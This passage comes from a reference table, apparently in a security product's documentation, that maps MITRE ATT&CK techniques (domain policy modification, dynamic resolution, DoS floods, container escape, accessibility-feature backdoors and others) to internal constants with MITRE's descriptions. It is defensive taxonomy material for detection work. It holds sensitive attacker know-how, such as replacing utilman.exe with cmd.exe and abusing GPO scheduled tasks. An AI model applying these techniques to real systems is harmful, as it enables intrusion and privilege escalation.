(https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye
Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) https://
attack.mitre.org/techniques/T1561/002
Original Mapped Description

T1484 XDM_CONST.MITRE_TECHNIQUE_DOMAIN_POLICY_MODIFICATION Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate
privileges in domain environments. Domains provide a centralized means of managing how computer
resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of
the domain also includes configuration settings that may apply between domains in a multi-domain/forest
environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or
changing trust settings for domains, including federation trusts. With sufficient permissions, adversaries can
modify domain policy settings. Since domain configuration settings control many of the interactions within
the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this
abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://
attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation:
ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO
Permissions) or modifying domain trusts to include an adversary controlled domain where they can control
access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft -
Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration
settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/
techniques/T1207). Adversaries may temporarily modify domain policy, carry out a malicious action(s), and
then revert the change to remove suspicious indicators. https://attack.mitre.org/techniques/T1484

T1484.002 XDM_CONST.MITRE_TECHNIQUE_DOMAIN_POLICY_MODIFICATION_DOMAIN_TRUST_MODIFICATION Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade
defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated,
allow authentication and authorization properties to apply between domains for the purpose of accessing
shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts,
credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the
domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to
add objects which they control. For example, this may be used to forge [SAML Tokens](https://
attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new
credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. https://
attack.mitre.org/techniques/T1484/002

T1484.001 XDM_CONST.MITRE_TECHNIQUE_DOMAIN_POLICY_MODIFICATION_GROUP_POLICY_MODIFICATION Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls
for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for
centralized management of user and computer settings in Active Directory (AD). GPOs are containers for
group policy settings made up of files stored within a predicable network path \
\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity
GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By
default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO
access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO
modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job]
(https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/
T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://
attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and
more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y
Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach)
Since GPOs can control so many user and machine settings in the AD environment, there are a great
number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) For
example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the
creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO
settings, in this case modifying
<GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.(Citation: Wald0 Guide to
GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific
user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows
NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because
the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y
SeEnableDelegationPrivilege Right) https://attack.mitre.org/techniques/T1484/001

T1482 XDM_CONST.MITRE_TECHNIQUE_DOMAIN_TRUST_DISCOVERY Adversaries may attempt to gather information on domain trust relationships that may be used to identify
lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a
mechanism for a domain to allow access to resources based on the authentication procedures of another
domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources
in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection]
(https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/
T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity
Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the
`DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain
Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by
adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply) https://attack.mitre.org/
techniques/T1482

T1189 XDM_CONST.MITRE_TECHNIQUE_DRIVE_BY_COMPROMISE Adversaries may gain access to a system through a user visiting a website over the normal course of
browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries
may also use compromised websites for non-exploitation behavior such as acquiring [Application Access
Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser
exist, including: * A legitimate website is compromised where adversaries have injected some form of
malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and
served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion
of any other kind of object that can be used to display web content or contain a script that executes on the
visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website
used by an adversary is one visited by a specific community, such as government, a particular industry, or
region, where the goal is to compromise a specific user or set of users based on a shared interest. This
kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several
known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by
compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2.
Scripts automatically execute, typically searching versions of the browser and plugins for a potentially
vulnerable version. * The user may be required to assist in this process by enabling scripting or active
website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code
is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on
the user's system unless other protections are in place. * In some cases a second visit to the website after
the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://
attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint
upon visiting a website. This will commonly give an adversary access to systems on the internal network
instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to
deliver a user to a malicious application designed to [Steal Application Access Token](https://
attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and
information. These malicious applications have been delivered through popups on legitimate websites.
(Citation: Volexity OceanLotus Nov 2017) https://attack.mitre.org/techniques/T1189

T1568 XDM_CONST.MITRE_TECHNIQUE_DYNAMIC_RESOLUTION Adversaries may dynamically establish connections to command and control infrastructure to evade
common detections and remediations. This may be achieved by using malware that shares a common
algorithm with the infrastructure the adversary uses to receive the malware's communications. These
calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port
number the malware uses for command and control. Adversaries may use dynamic resolution for the
purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the
primary command and control server malware may employ dynamic resolution as a means to
reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April
2017)(Citation: ESET Sednit 2017 Activity) https://attack.mitre.org/techniques/T1568

T1568.003 XDM_CONST.MITRE_TECHNIQUE_DYNAMIC_RESOLUTION_DNS_CALCULATION Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP
address to use for command and control, rather than relying on a predetermined port number or the actual
returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2
channel.(Citation: Meyers Numbered Panda) One implementation of [DNS Calculation](https://
attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response
and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered
Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage) https://attack.mitre.org/techniques/
T1568/003
Original Mapped Description

T1568.002 XDM_CONST.MITRE_TECHNIQUE_DYNAMIC_RESOLUTION_DOMAIN_GENERATION_ALGORITHMS Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination
domain for command and control traffic rather than relying on a list of static IP addresses or domains. This
has the advantage of making it much harder for defenders block, track, or take over the command and
control channel, as there potentially could be thousands of domains that malware can check for
instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA
Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru)
when they construct domain names by generating each letter. Alternatively, some DGAs employ whole
words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are
time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others
incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation:
Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation:
Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://
attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server
malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup
2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) https://attack.mitre.org/
techniques/T1568/002

T1568.001 XDM_CONST.MITRE_TECHNIQUE_DYNAMIC_RESOLUTION_FAST_FLUX_DNS Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly
changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain
name, with multiple IP addresses assigned to it which are swapped with high frequency, using a
combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.
(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity) The
simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A
(address) record list for a single DNS name. These registrations have a five-minute average lifespan,
resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity) In contrast, the
"double-flux" method registers and de-registers an address as part of the DNS Name Server record list for
the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act
as a proxy to the C2 host, further insulating the true source of the C2 channel. https://attack.mitre.org/
techniques/T1568/001

T1114 XDM_CONST.MITRE_TECHNIQUE_EMAIL_COLLECTION Adversaries may target user email to collect sensitive information. Emails may contain sensitive data,
including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can
collect or forward email from mail servers or clients. https://attack.mitre.org/techniques/T1114

T1114.003 XDM_CONST.MITRE_TECHNIQUE_EMAIL_COLLECTION_EMAIL_FORWARDING_RULE Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse
email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on
the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT
TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access
to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter -
Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions,
including forwarding to a different recipient. These rules may be created through a local email application, a
web interface, or by command-line interface. Messages can be forwarded to internal or external recipients,
and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules
for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael
Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules) Any user or administrator within the
organization (or adversary with valid credentials) can create rules to automatically forward all received
messages to another recipient, forward emails to different locations based on the sender, and more.
Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule
properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.
(Citation: Pfammatter - Hidden Inbox Rules) https://attack.mitre.org/techniques/T1114/003

T1114.001 XDM_CONST.MITRE_TECHNIQUE_EMAIL_COLLECTION_LOCAL_EMAIL_COLLECTION Adversaries may target user email on local systems to collect sensitive information. Files containing email
data can be acquired from a user’s local system, such as Outlook storage or cache files. Outlook stores
data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to
50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in
Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas
IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically
stored in `C:\Users\ \Documents\Outlook Files` or `C:\Users\ \AppData\Local\Microsoft\Outlook`.(Citation:
Microsoft Outlook Files) https://attack.mitre.org/techniques/T1114/001

T1114.002 XDM_CONST.MITRE_TECHNIQUE_EMAIL_COLLECTION_REMOTE_EMAIL_COLLECTION Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive
information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to
acquire information from within a network. Adversaries may also access externally facing Exchange
services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such
as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific
keywords. https://attack.mitre.org/techniques/T1114/002

T1573 XDM_CONST.MITRE_TECHNIQUE_ENCRYPTED_CHANNEL Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than
relying on any inherent protections provided by a communication protocol. Despite the use of a secure
algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/
or generated within malware samples/configuration files. https://attack.mitre.org/techniques/T1573

T1573.002 XDM_CONST.MITRE_TECHNIQUE_ENCRYPTED_CHANNEL_ASYMMETRIC_CRYPTOGRAPHY Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic
rather than relying on any inherent protections provided by a communication protocol. Asymmetric
cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely
distributed, and one private. Due to how the keys are generated, the sender encrypts data with the
receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the
intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and
ElGamal. For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a
connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these
protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).
https://attack.mitre.org/techniques/T1573/002

T1573.001 XDM_CONST.MITRE_TECHNIQUE_ENCRYPTED_CHANNEL_SYMMETRIC_CRYPTOGRAPHY Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic
rather than relying on any inherent protections provided by a communication protocol. Symmetric
encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common
symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4. https://attack.mitre.org/
techniques/T1573/001
Original Mapped Description

T1499 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of
services to users. Endpoint DoS can be performed by exhausting the system resources those services are
hosted on or exploiting the system to cause a persistent crash condition. Example services include
websites, email services, DNS, and web-based applications. Adversaries have been observed conducting
DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support
other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012),
hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability
of a service without saturating the network used to provide access to the service. Adversaries can target
various layers of the application stack that is hosted on the system used to provide the service. These
layers include the Operating Systems (OS), server applications such as web servers, DNS servers,
databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires
different techniques that take advantage of bottlenecks that are unique to the respective components. A
DoS attack may be generated by a single system or multiple systems spread across the internet, which is
commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources,
several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use
the original IP address of an attacking system, or spoof the source IP address to make the attack traffic
more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty
defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by
the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks
against networks and services. Large botnets can generate a significant amount of traffic from systems
spread across the global internet. Adversaries may have the resources to build out and control their own
botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases
for DDoS, so many systems are used to generate requests that each one only needs to send out a small
amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances,
distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in
some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US
banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may
be points in the the global network (such as high traffic gateway routers) where packets can be altered and
cause legitimate clients to execute code that directs network packets toward a target in high volume. This
type of capability was previously used for the purposes of web censorship where client HTTP traffic was
modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web
servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing
network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). https://attack.mitre.org/
techniques/T1499

T1499.003 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE_APPLICATION_EXHAUSTION_FLOOD Adversaries may target resource intensive features of web applications to cause a denial of service (DoS).
Specific features in web applications may be highly resource intensive. Repeated requests to those
features may be able to exhaust system resources and deny access to the application or the server itself.
(Citation: Arbor AnnualDoSreport Jan 2018) https://attack.mitre.org/techniques/T1499/003

T1499.004 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE_APPLICATION_OR_SYSTEM_EXPLOITATION Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny
availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical
applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS
condition. https://attack.mitre.org/techniques/T1499/004

T1499.001 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE_OS_EXHAUSTION_FLOOD Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for
managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a
system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from
being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including
TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan
2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is
never completed. Because each OS has a maximum number of concurrent TCP connections that it will
allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus
preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods
leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces
the OS to search its state table for a related TCP connection that has already been established. Because
the ACK packets are for connections that do not exist, the OS will have to search the entire state table to
confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational
requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to
eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted
service.(Citation: Corero SYN-ACKflood) https://attack.mitre.org/techniques/T1499/001

T1499.002 XDM_CONST.MITRE_TECHNIQUE_ENDPOINT_DENIAL_OF_SERVICE_SERVICE_EXHAUSTION_FLOOD Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries
often target DNS and web services, however others have been targeted as well.(Citation: Arbor
AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of
which apply generally while others are specific to the software being used to provide the service. One
example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number
of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood
relies on raw volume to accomplish the objective, exhausting any of the various resources required by the
victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL
renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite
includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent
secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto
algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to
make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in
computation cycles, this can cause an impact to the availability of the service when done in volume.
(Citation: Arbor SSLDoS April 2012) https://attack.mitre.org/techniques/T1499/002

T1611 XDM_CONST.MITRE_TECHNIQUE_ESCAPE_TO_HOST Adversaries may break out of a container to gain access to the underlying host. This can allow an
adversary access to other containerized resources from the host level or to the host itself. In principle,
containerized resources should provide a clear separation of application functionality and be isolated from
the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a
host environment. Examples include creating a container configured to mount the host’s filesystem using
the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron
on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker
Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may
also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as
exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.
(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary
with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally
within the environment, or setting up a command and control channel on the host. https://attack.mitre.org/
techniques/T1611

T1585 XDM_CONST.MITRE_TECHNIQUE_ESTABLISH_ACCOUNTS Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries
can create accounts that can be used to build a persona to further operations. Persona development
consists of the development of public information, presence, history and appropriate affiliations. This
development could be applied to social media, website, or other publicly available information that could be
referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.
(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) For operations incorporating social
engineering, the utilization of an online persona may be important. These personas may be fictitious or
impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook,
LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of
additional documentation to make them seem real. This could include filling out profile information,
developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation:
BlackHatRobinSage) Establishing accounts can also include the creation of accounts with email providers,
which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or
[Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) https://attack.mitre.org/
techniques/T1585
Original Mapped Description

T1585.002 XDM_CONST.MITRE_TECHNIQUE_ESTABLISH_ACCOUNTS_EMAIL_ACCOUNTS Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts
created with email providers to further their operations, such as leveraging them to conduct [Phishing for
Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/
T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email
account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to
increase the chance of success of follow-on behaviors. Created email accounts can also be used in the
acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation:
Mandiant APT1) To decrease the chance of physically tying back operations to themselves, adversaries
may make use of disposable email services.(Citation: Trend Micro R980 2016) https://attack.mitre.org/
techniques/T1585/002

T1585.001 XDM_CONST.MITRE_TECHNIQUE_ESTABLISH_ACCOUNTS_SOCIAL_MEDIA_ACCOUNTS Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries
can create social media accounts that can be used to build a persona to further operations. Persona
development consists of the development of public information, presence, history and appropriate
affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) For operations incorporating
social engineering, the utilization of a persona on social media may be important. These personas may be
fictitious or impersonate real people. The persona may exist on a single social media site or across multiple
sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require
development of additional documentation to make them seem real. This could include filling out profile
information, developing social networks, or incorporating photos. Once a persona has been developed an
adversary can use it to create connections to targets of interest. These connections may be direct or may
include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial
Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). https://
attack.mitre.org/techniques/T1585/001

T1546 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger
execution based on specific events. Various operating systems have means to monitor and subscribe to
events such as logons or other user activity such as running specific applications/binaries. Adversaries may
abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing
malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to
point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye
WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be
proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may
be able to abuse these triggered execution mechanisms to escalate their privileges. https://attack.mitre.org/
techniques/T1546

T1546.008 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_ACCESSIBILITY_FEATURES Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by accessibility features. Windows contains accessibility features that may be launched with a key
combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary
can modify the way these programs are launched to get a command prompt or backdoor without logging in
to the system. Two common accessibility programs are C:\Windows\System32\sethc.exe, launched
when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the
Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and
has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation:
FireEye Hikit Rootkit) Depending on the version of Windows, an adversary may take advantage of these
features in different ways. Common methods used by adversaries include replacing accessibility feature
binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the
replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and
it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky
Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012)
debugger method was likely discovered as a potential workaround because it does not require the
corresponding accessibility feature binary to be replaced. For simple binary replacement on Windows XP
and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:
\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides
backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting
at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/
T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016
Sticky Keys)(Citation: Narrator Accessibility Abuse) * On-Screen Keyboard: C:
\Windows\System32\osk.exe * Magnifier: C:\Windows\System32\Magnify.exe * Narrator: C:
\Windows\System32\Narrator.exe * Display Switcher: C:\Windows\System32\DisplaySwitch.exe *
App Switcher: C:\Windows\System32\AtBroker.exe https://attack.mitre.org/techniques/T1546/008

T1546.009 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_APPCERT_DLLS Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the
AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session
Manager\ are loaded into every process that calls the ubiquitously used application programming interface
(API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW,
CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017) Similar to [Process
Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges
by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.
https://attack.mitre.org/techniques/T1546/009

T1546.010 XDM_CONST.MITRE_TECHNIQUE_EVENT_TRIGGERED_EXECUTION_APPINIT_DLLS Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered
by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the
